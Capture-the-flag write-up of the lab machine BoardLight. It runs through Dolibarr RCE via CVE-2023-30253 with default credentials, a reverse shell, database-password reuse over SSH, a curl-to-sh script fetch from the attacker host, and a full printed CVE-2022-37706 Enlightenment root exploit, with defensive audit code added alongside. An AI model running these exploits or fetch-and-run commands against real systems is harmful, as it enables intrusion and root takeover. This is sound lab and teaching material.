BoardLight

Recon

(embedded file: nmap_scan.log, contents not included here)

HTTP (80)

Pasted_image_20240527235805.png
┌──(woyag㉿kraken)-[~/Desktop/Rooms/BoardLight]
└─$ feroxbuster -u http://10.10.11.11/ -w /usr/share/seclists/Discovery/Web-Content/common.txt -d 1 -x php

 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.10.3
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://10.10.11.11/
 🚀  Threads               │ 50
 📖  Wordlist              │ /usr/share/seclists/Discovery/Web-Content/common.txt
 👌  Status Codes          │ All Status Codes!
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.10.3
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 🔎  Extract Links         │ true
 💲  Extensions            │ [php]
 🏁  HTTP methods          │ [GET]
 🔃  Recursion Depth       │ 1
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404      GET        9l       31w      273c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
403      GET        9l       28w      276c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
404      GET        1l        3w       16c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200      GET        5l       23w     1217c http://10.10.11.11/images/location-white.png
200      GET        7l       48w     3995c http://10.10.11.11/images/d-5.png
200      GET      294l      633w     9209c http://10.10.11.11/do.php
200      GET        5l       48w     1493c http://10.10.11.11/images/fb.png
200      GET      280l      652w     9100c http://10.10.11.11/about.php
200      GET      517l     1053w    15949c http://10.10.11.11/
200      GET      294l      635w     9426c http://10.10.11.11/contact.php
301      GET        9l       28w      308c http://10.10.11.11/css => http://10.10.11.11/css/
301      GET        9l       28w      311c http://10.10.11.11/images => http://10.10.11.11/images/
301      GET        9l       28w      307c http://10.10.11.11/js => http://10.10.11.11/js/
[####################] - 22s     4761/4761    0s      found:10      errors:2737
[####################] - 21s     4728/4728    223/s   http://10.10.11.11/

Hmm, nothing interesting. We do have an email linked to board.htb, so let's add it to /etc/hosts and try to enumerate subdomains.

crm.board.htb

┌──(woyag㉿kraken)-[~/Desktop/Rooms/BoardLight]
└─$ domain="board.htb"; ffuf -u "http://$domain" -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt -H "Host: FUZZ.$domain" -mc all -fl 518
       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://board.htb
 :: Wordlist         : FUZZ: /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt
 :: Header           : Host: FUZZ.board.htb
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: all
 :: Filter           : Response lines: 518
________________________________________________

crm                     [Status: 200, Size: 6360, Words: 397, Lines: 150, Duration: 222ms]
:: Progress: [4989/4989] :: Job [1/1] :: 170 req/sec :: Duration: [0:00:29] :: Errors: 0 ::
Pasted_image_20240528000258.png

Searching for the version we end up with a CVE: https://www.swascan.com/security-advisory-dolibarr-17-0-0/

We are able to log in with default credentials:

Creds: admin:admin

Pasted_image_20240528000734.png

RCE

(embedded file: CVE-2023-30253.py, contents not included here)

The fricking app was deleting my website in like 5 seconds so I just created a PoC script.

┌──(woyag㉿kraken)-[~/Desktop/Rooms/BoardLight]
└─$ py CVE-2023-30253.py
[+] Token: 2d11f087577b4e3739fa6229c4e6e38d
[+] Login Success!
[+] Website Created!
[+] Page Created!
[+] Payload Injected!
---
┌──(woyag㉿kraken)-[~/Desktop/Rooms/BoardLight]
└─$ pwncat -lp 4444
[17:37:15] Welcome to pwncat 🐈!                                                          __main__.py:164
[17:40:31] received connection from 10.10.11.11:36888                                          bind.py:84
[17:40:33] 10.10.11.11:36888: registered new host w/ db                                    manager.py:957
(local) pwncat$
(remote) www-data@boardlight:/var/www/html/crm.board.htb/htdocs/website$

Config

(remote) www-data@boardlight:/var/www/html/crm.board.htb/htdocs/conf$ cat conf.php | grep -v '//'
<?php
$dolibarr_main_document_root='/var/www/html/crm.board.htb/htdocs';
$dolibarr_main_url_root_alt='/custom';
$dolibarr_main_document_root_alt='/var/www/html/crm.board.htb/htdocs/custom';
$dolibarr_main_data_root='/var/www/html/crm.board.htb/documents';
$dolibarr_main_db_host='localhost';
$dolibarr_main_db_port='3306';
$dolibarr_main_db_name='dolibarr';
$dolibarr_main_db_prefix='llx_';
$dolibarr_main_db_user='dolibarrowner';
$dolibarr_main_db_pass='serverfun2$2023!!';
$dolibarr_main_db_type='mysqli';
$dolibarr_main_db_character_set='utf8';
$dolibarr_main_db_collation='utf8_unicode_ci';
$dolibarr_main_authentication='dolibarr';

$dolibarr_main_prod='0';
$dolibarr_main_force_https='0';
$dolibarr_main_restrict_os_commands='mysqldump, mysql, pg_dump, pgrestore';
$dolibarr_nocsrfcheck='0';
$dolibarr_main_instance_unique_id='ef9a8f59524328e3c36894a9ff0562b5';
$dolibarr_mailing_limit_sendbyweb='0';
$dolibarr_mailing_limit_sendbycli='0';
(remote) www-data@boardlight:/var/www/html/crm.board.htb/htdocs/conf$ ls /home
larissa
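The conf.php dump above is what hands over the box: the DB password sits in cleartext in a file www-data can read, production mode and forced HTTPS are both off, and the same password turns out to be larissa's. A small audit I'd run on any Dolibarr install after seeing this (an added example, not code from the box or from the Dolibarr project): it parses the `$name='value';` lines, flags those settings and checks the file mode. The sample config is constructed with placeholder values, and `parse_conf`, `audit_conf`, `conf_mode_too_open` and the `HARDENED` table are my own names.

```python
import re
import stat

# Constructed sample in the shape of the conf.php dumped above; values are placeholders, not the box's.
SAMPLE_CONF = """<?php
// Dolibarr main config (constructed sample)
$dolibarr_main_document_root='/var/www/html/crm.example/htdocs';
$dolibarr_main_db_host='localhost';
$dolibarr_main_db_name='dolibarr';
$dolibarr_main_db_user='dolibarrowner';
$dolibarr_main_db_pass='PLACEHOLDER_db_password';
$dolibarr_main_authentication='dolibarr';
$dolibarr_main_prod='0';
$dolibarr_main_force_https='0';
$dolibarr_nocsrfcheck='0';
"""

# Matches one  $name='value';  line (single-quoted PHP string, backslash escapes allowed).
ASSIGN_RE = re.compile(r"^\s*\$(\w+)\s*=\s*'((?:[^'\\]|\\.)*)'\s*;", re.M)

# key -> (value a hardened install should carry, why it matters)
HARDENED = {
    "dolibarr_main_prod": ("1", "production mode off, so debug output and verbose errors are reachable"),
    "dolibarr_main_force_https": ("1", "HTTPS not forced, so logins can travel in clear"),
    "dolibarr_nocsrfcheck": ("0", "CSRF check disabled"),
}


def parse_conf(text):
    """Return {variable_name: value} for every $name='value'; line in a conf.php body."""
    return {m.group(1): m.group(2) for m in ASSIGN_RE.finditer(text)}


def audit_conf(text, other_secrets=()):
    """Return a list of findings for one conf.php body.

    other_secrets: passwords known from elsewhere (constructed by the caller), so that reuse of
    the DB password for a system account, which is what gave us larissa above, gets flagged.
    """
    conf = parse_conf(text)
    findings = []
    for key, (wanted, why) in HARDENED.items():
        if conf.get(key) != wanted:
            findings.append(f"{key}={conf.get(key)!r}: {why}")
    db_pass = conf.get("dolibarr_main_db_pass", "")
    if db_pass:
        findings.append("dolibarr_main_db_pass stored in cleartext: anyone who can read conf.php "
                        "(here www-data) owns the database")
        if db_pass in set(other_secrets):
            findings.append("dolibarr_main_db_pass is reused for another account")
    return findings


def conf_mode_too_open(mode):
    """True if a conf.php st_mode lets 'other' read it; a file holding a DB password should not be world-readable."""
    return bool(mode & stat.S_IROTH)


if __name__ == "__main__":
    # other_secrets is a constructed set standing in for passwords harvested from other stores on the host
    for line in audit_conf(SAMPLE_CONF, other_secrets={"PLACEHOLDER_db_password"}):
        print("[!]", line)
```

Point the parser at a real conf.php and pass in whatever other secrets you hold (shadow-cracked hashes, other app configs) to surface the reuse that made the SSH step below trivial.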

SSH

We are able to SSH in with the database password.

Creds: larissa:serverfun2$2023!!

User.txt

larissa@boardlight:~$ cat user.txt
ac562f5e61623471ea40e49cbd04ba8b

Privilege Escalation

larissa@boardlight:/tmp/t$ curl 10.10.16.54/lp.sh | sh | tee lp.log
...
╔══════════╣ Sudo version
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-version
Sudo version 1.8.31

╔══════════╣ Executing Linux Exploit Suggester
╚ https://github.com/mzet-/linux-exploit-suggester
[+] [CVE-2022-0847] DirtyPipe

   Details: https://dirtypipe.cm4all.com/
   Exposure: probable
   Tags: [ ubuntu=(20.04|21.04) ],debian=11
   Download URL: https://haxx.in/files/dirtypipez.c

[+] [CVE-2021-3156] sudo Baron Samedit

   Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
   Exposure: probable
   Tags: mint=19,[ ubuntu=18|20 ], debian=10
   Download URL: https://codeload.github.com/blasty/CVE-2021-3156/zip/main

[+] [CVE-2021-3156] sudo Baron Samedit 2

   Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
   Exposure: probable
   Tags: centos=6|7|8,[ ubuntu=14|16|17|18|19|20 ], debian=9|10
   Download URL: https://codeload.github.com/worawit/CVE-2021-3156/zip/main

[+] [CVE-2021-22555] Netfilter heap out-of-bounds write

   Details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html
   Exposure: probable
   Tags: [ ubuntu=20.04 ]{kernel:5.8.0-*}
   Download URL: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c
   ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c
   Comments: ip_tables kernel module must be loaded


╔══════════╣ Executing Linux Exploit Suggester 2
╚ https://github.com/jondonas/linux-exploit-suggester-2
...
larissa@boardlight:/tmp/t$ curl 10.10.16.54/exploit_nss.py -Os
larissa@boardlight:/tmp/t$ python3 exploit_nss.py
Traceback (most recent call last):
  File "exploit_nss.py", line 220, in <module>
    assert check_is_vuln(), "target is patched"
AssertionError: target is patched

DirtyPipe also failed to gain root.

If we take a look at SUID binaries on the system we see some odd files from Enlightenment:

larissa@boardlight:/tmp$ find / -perm -4000 2>/dev/null
/usr/lib/eject/dmcrypt-get-device
/usr/lib/xorg/Xorg.wrap
/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys
/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_ckpasswd
/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_backlight
/usr/lib/x86_64-linux-gnu/enlightenment/modules/cpufreq/linux-gnu-x86_64-0.23.1/freqset
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/sbin/pppd
/usr/bin/newgrp
/usr/bin/mount
/usr/bin/sudo
/usr/bin/su
/usr/bin/chfn
/usr/bin/umount
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/fusermount
/usr/bin/chsh
/usr/bin/vmware-user-suid-wrapper
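The Enlightenment helpers stand out here only because you know what a stock Ubuntu install ships set-uid. That is the check a defender should automate: diff the live set-uid inventory against a baseline. Added example (not from the box or any project): it parses the find output above, compares it with a baseline and also has a live collector equivalent to `find / -perm -4000`. The baseline set is my assumption about a default Ubuntu 20.04 desktop, so build the real one from a clean reference image or package manifests; `parse_find_output`, `unexpected_suid` and `collect_suid` are my names.

```python
import os
import stat

# The find output from the box, pasted so the diff below runs offline.
FIND_OUTPUT = """\
/usr/lib/eject/dmcrypt-get-device
/usr/lib/xorg/Xorg.wrap
/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys
/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_ckpasswd
/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_backlight
/usr/lib/x86_64-linux-gnu/enlightenment/modules/cpufreq/linux-gnu-x86_64-0.23.1/freqset
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/sbin/pppd
/usr/bin/newgrp
/usr/bin/mount
/usr/bin/sudo
/usr/bin/su
/usr/bin/chfn
/usr/bin/umount
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/fusermount
/usr/bin/chsh
/usr/bin/vmware-user-suid-wrapper
"""

# Assumption: what a stock Ubuntu 20.04 desktop ships set-uid. Illustrative only; generate the
# real baseline from a clean reference image of the same release.
BASELINE_SUID = {
    "/usr/lib/eject/dmcrypt-get-device",
    "/usr/lib/xorg/Xorg.wrap",
    "/usr/lib/dbus-1.0/dbus-daemon-launch-helper",
    "/usr/lib/openssh/ssh-keysign",
    "/usr/sbin/pppd",
    "/usr/bin/newgrp",
    "/usr/bin/mount",
    "/usr/bin/sudo",
    "/usr/bin/su",
    "/usr/bin/chfn",
    "/usr/bin/umount",
    "/usr/bin/gpasswd",
    "/usr/bin/passwd",
    "/usr/bin/fusermount",
    "/usr/bin/chsh",
}

# Pseudo filesystems that waste time and produce noise when walked.
SKIP_DIRS = {"/proc", "/sys", "/dev", "/run"}


def parse_find_output(text):
    """Keep only the absolute paths from a `find / -perm -4000` transcript (drops prompts and blank lines)."""
    return [line.strip() for line in text.splitlines() if line.strip().startswith("/")]


def unexpected_suid(paths, baseline=BASELINE_SUID):
    """Set-uid binaries that are not on the baseline, sorted so reports are stable between runs."""
    return sorted(set(paths) - set(baseline))


def collect_suid(root="/"):
    """Live equivalent of `find / -perm -4000`: walk the tree with lstat so symlinks are never followed."""
    hits = []
    for dirpath, dirnames, filenames in os.walk(root, onerror=lambda err: None):
        dirnames[:] = [d for d in dirnames if os.path.join(dirpath, d) not in SKIP_DIRS]
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                hits.append(path)
    return hits


if __name__ == "__main__":
    # Offline run over the pasted transcript; swap in collect_suid("/") for a live host.
    for path in unexpected_suid(parse_find_output(FIND_OUTPUT)):
        print("[!] unexpected set-uid binary:", path)
```

Run periodically and alert on any new entry: a desktop environment helper or a VMware wrapper gaining set-uid is exactly the kind of change that deserves a ticket before someone finds the CVE for it.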

Root.txt

A quick Google search shows us a known exploit: https://github.com/MaherAzzouzi/CVE-2022-37706-LPE-exploit

larissa@boardlight:/tmp$  echo "CVE-2022-37706"
echo "[*] Trying to find the vulnerable SUID file..."
echo "[*] This may take few seconds..."

file=$(find / -name enlightenment_sys -perm -4000 2>/dev/null | head -1)
if [[ -z ${file} ]]
then
	echo "[-] Couldn't find the vulnerable SUID file..."
	echo "[*] Enlightenment should be installed on your system."
	exit 1
fi

echo "[+] Vulnerable SUID binary found!"
echo "[+] Trying to pop a root shell!"
mkdir -p /tmp/net
mkdir -p "/dev/../tmp/;/tmp/exploit"

echo "/bin/sh" > /tmp/exploit
chmod a+x /tmp/exploit
echo "[+] Enjoy the root shell :)"
${file} /bin/mount -o noexec,nosuid,utf8,nodev,iocharset=utf8,utf8=0,utf8=1,uid=$(id -u), "/dev/../tmp/;/tmp/exploit" /tmp///net

mount: /dev/../tmp/: cant find in /etc/fstab.
## whoami
root
## cd /root
## ls
root.txt  snap
## cat root.txt
dcddc7a55c4749fbdb1e16b70660e295
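Worth understanding why the directory name `/dev/../tmp/;/tmp/exploit` works, because the mount error followed by a root prompt tells the whole story: the set-uid helper accepts the argument because it starts with `/dev/`, assembles a mount command line as a string, and hands it to a shell, so the `;` ends the mount command (which fails, hence the fstab error) and `/tmp/exploit` runs as root. Below is an added model of those two mistakes next to the hardened versions; it is my own code, not Enlightenment's source or the exploit repo's. `naive_is_device`, `hardened_is_device`, `build_mount_shell`, `build_mount_argv` and `shell_commands` are my names, the shell splitting is a simplification via shlex, and the mount options are shortened from the ones in the script above.

```python
import os
import re
import shlex

# A device argument a set-uid mount helper may accept: absolute path, conservative character set.
SAFE_PATH_RE = re.compile(r"^/[A-Za-z0-9_./-]*$")


def naive_is_device(path):
    """The kind of check the exploit gets past: a prefix test on the raw string."""
    return path.startswith("/dev/")


def hardened_is_device(path):
    """Reject shell metacharacters up front, then test the prefix on the canonical path so '..' cannot leave /dev."""
    if not SAFE_PATH_RE.match(path):
        return False
    return os.path.realpath(path).startswith("/dev/")


def build_mount_shell(opts, source, target):
    """Vulnerable pattern: one string destined for system(); a ';' inside source ends the mount command."""
    return f"/bin/mount -o {opts} {source} {target}"


def build_mount_argv(opts, source, target):
    """Hardened pattern: argv list for execve with no shell, so each value is exactly one argument."""
    return ["/bin/mount", "-o", opts, source, target]


def shell_commands(cmdline):
    """Split a command line the way sh would at ';' (simplified: shlex with punctuation_chars), one argv list per command."""
    lexer = shlex.shlex(cmdline, posix=True, punctuation_chars=True)
    lexer.whitespace_split = True
    commands, current = [], []
    for tok in lexer:
        if tok == ";":
            if current:
                commands.append(current)
            current = []
        else:
            current.append(tok)
    if current:
        commands.append(current)
    return commands


if __name__ == "__main__":
    source = "/dev/../tmp/;/tmp/exploit"  # the directory name the script above creates
    opts = "noexec,nosuid,nodev,uid=1000"  # shortened option string, uid is a placeholder
    print("naive check:", naive_is_device(source), "hardened check:", hardened_is_device(source))
    for argv in shell_commands(build_mount_shell(opts, source, "/tmp///net")):
        print("shell would run:", argv)
    print("argv form, one argument:", build_mount_argv(opts, source, "/tmp///net")[3])
```

The second command the shell sees is `/tmp/exploit /tmp///net`, which is the attacker's `/bin/sh` wrapper running as root. Either fix alone closes this path: validate on the canonical path with a strict character set, or stop building command strings for `system()` and exec `mount` with an argv list. On a host you cannot patch yet, `chmod u-s` on `enlightenment_sys` removes the privilege the bug needs.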
